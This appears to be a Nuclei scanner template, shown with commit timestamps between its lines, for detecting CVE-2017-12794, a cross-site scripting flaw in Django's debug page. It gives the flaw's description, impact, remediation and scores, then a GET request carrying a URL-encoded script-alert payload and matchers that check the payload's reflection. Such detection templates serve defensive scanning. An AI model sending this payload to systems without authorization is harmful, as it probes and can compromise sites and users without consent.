2021-06-24 15:49:12 +00:00
id : CVE-2017-12794
info :
2022-04-29 19:58:07 +00:00
name : Django Debug Page - Cross-Site Scripting
2021-06-24 15:49:12 +00:00
author : pikpikcu
severity : medium
2022-04-22 10:38:41 +00:00
description : |
2022-04-29 19:58:07 +00:00
Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible).
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project.
2021-08-18 11:37:49 +00:00
reference :
2021-06-24 15:49:12 +00:00
- https://twitter.com/sec715/status/1406779605055270914
- https://nvd.nist.gov/vuln/detail/CVE-2017-12794
2022-05-17 09:18:12 +00:00
- https://www.djangoproject.com/weblog/2017/sep/05/security-releases/
2022-07-01 10:02:07 +00:00
- http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264
2023-07-15 16:29:17 +00:00
- http://www.securitytracker.com/id/1039264
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-12794
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00219
2023-12-12 11:07:52 +00:00
epss-percentile : 0.59669
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : djangoproject
product : django
2023-12-05 09:50:33 +00:00
tags : xss,django,cve,cve2017,djangoproject
2021-06-24 15:49:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-24 15:49:12 +00:00
- method : GET
path :
2021-06-29 04:37:07 +00:00
- "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
2021-06-24 15:49:12 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-06-24 15:49:12 +00:00
words :
- "<script>alert(document.domain)</script>"
2021-06-29 04:37:07 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-06-29 04:37:07 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4b0a00483046022100c3e6f228ecb88b45dede1fdb09bc0de8eb69e3910bef23a8b392cc658b900416022100f5764bd903049f446e74a2490b9686da2809edffc40fba47ccd1bacfc8051eb7:922c64590222798bb761d5b6d8e72950